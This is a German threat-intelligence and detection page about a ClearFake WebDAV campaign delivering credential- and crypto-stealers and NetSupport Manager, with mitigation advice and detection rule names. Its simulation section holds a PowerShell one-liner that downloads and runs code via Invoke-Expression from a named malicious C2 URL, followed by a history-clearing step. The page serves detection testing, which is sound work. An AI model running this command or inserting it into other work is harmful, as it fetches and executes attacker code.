ClearFake-WebDAV-Infektionskette liefert Amatera Stealer, ZigCryptoStealer und NetSupport Manager
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine Kampagne, die von ClearFake angetrieben wird, missbraucht WebDAV und Cloudflare Workers, um mehrere Malware-Nutzlasten zu verteilen. Die Hauptnutzlast, Amatera-Stealer, ist darauf ausgelegt, Anmeldedaten und kryptowährungsrelevante Daten zu exfiltrieren. Zusätzliche Nutzlasten umfassen ZigCryptoStealer, der über einen NativeAOT-Loader geliefert wird, und unautorisierte Instanzen von NetSupport Manager, die verwendet werden, um Fernzugriff zu etablieren.
Untersuchung
Cisco Talos untersuchte verdächtige WebDAV-basierte DLL-Ausführung bei einer ukrainischen Regierungsorganisation. Die Analyse deckte zwei getrennte Infektionsketten auf: eine nutzte einen pf.ch Loader, um ZigCryptoStealer und einen auf Go basierenden Reverse Proxy bereitzustellen, und die andere verwendete einen verification.google Loader, um NetSupport Manager zu installieren.
Minderung
Organisationen sollten die Ausführung von WebDAV- und UNC-Pfaden einschränken und auf anomales rundll32.exe Verhalten achten. Robuste EDR-Kontrollen sollten eingesetzt werden, um Techniken wie DLL Hollowing und Module Stomping zu erkennen. Sicherheitsteams sollten auch unautorisierte Nutzung von NetSupport Manager und verdächtige blockchain-bezogene Netzwerkaktivitäten überwachen.
Reaktion
Wenn bösartige Aktivitäten erkannt werden, sollten betroffene Endpunkte sofort isoliert werden, um zusätzliche Datenexfiltration zu verhindern. Ermittler sollten Speicherforensik durchführen, um residente Malware wie Amatera zu identifizieren. Sicherheitsteams sollten auch nach WebDAV-basierter DLL-Ausführung und ungewöhnlichen PowerShell-Aktivitäten in der Umgebung suchen.
Angriffsablauf
Wir aktualisieren diesen Abschnitt noch.
Erkennungen
Verdächtige PowerShell-Strings (via Powershell)
LOLBAS Conhost (via cmdline)
Mögliche PowerShell-Obfuskationsindikatoren (via Powershell)
Möglicher Missbrauch von Telegram als Befehls- und Kontrollkanal (via dns_query)
Verdächtige Befehls- und Kontrollmaßnahmen durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)
IOCs (SourceIP) zur Erkennung: ClearFake-WebDAV-Infektionskette liefert Amatera-Stealer, ZigCryptoStealer und NetSupport Manager
IOCs (DestinationIP) zur Erkennung: ClearFake-WebDAV-Infektionskette liefert Amatera-Stealer, ZigCryptoStealer und NetSupport Manager
C2-Kommunikation über WebSocket Secure mit Dubbedmuch für Datenexfiltration [Proxy]
Erkennung von PowerShell-Skriptdownload und Ausführung von NetSupport Manager [Windows Powershell]
WebDAV DLL-Ausführung via rundll32.exe [Windows-Prozess-Erstellung]
Simulation der Ausführung
Voraussetzung: Der Telemetrie- & Basislinien-Pre-Flight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die zur Auslösung der Erkennungsregel entwickelt wurde. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennung erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle: Der Gegner simuliert eine „ClearFake“-Infektionskette. Das Ziel ist es, das Fernzugriffs-Tool NetSupport Manager bereitzustellen, um Persistenz und Fernsteuerung zu etablieren. Um signaturbasierte Erkennung von Dateidownloads zu vermeiden, verwendet der Angreifer einen PowerShell-„One-Liner“, der eine JavaScript/PowerShell-Nutzlast von einem entfernten C2-Server (
https://kr.cedar2glanz.ru/jewel.js) abruft und direkt im Speicherpuffer mitInvoke-Expressionausführt. Diese Technik hinterlässt einen minimalen Datenträgerabdruck. -
Regressionstest-Skript:
# Simulationsskript: ahmt die Ausführung der ClearFake-Infektionskettennutzlast nach # WARNUNG: Dieses Skript verwendet die spezifische bösartige URL, die in der Erkennungsregel definiert ist, um einen Alarm auszulösen. $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js" Write-Host "[+] Simulierte bösartige PowerShell-Download und Ausführung..." -ForegroundColor Yellow # Dieser Befehl imitiert das genaue Muster: URL + IEX/Invoke-Expression # Wir verwenden einen Try/Catch-Block, da die URL tatsächlich unerreichbar/tot ist, # aber die PROCESS COMMAND LINE wird trotzdem protokolliert. try { Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl) } catch { Write-Host "[!] Befehl ausgeführt (Netzwerkfehler erwartet, aber Telemetrie sollte erzeugt werden)." -ForegroundColor Cyan } -
Bereinigungskommandos:
# Durch diese spezifische Simulation werden keine Dateien erstellt, da es sich um einen In-Memory-Ausführungstest handelt. # Dennoch löschen wir den Befehlshistorie, um Spuren aus der lokalen Benutzersitzung zu entfernen. Clear-History Write-Host "[+] Bereinigung abgeschlossen. Keine Artefakte auf Datenträger." -ForegroundColor Green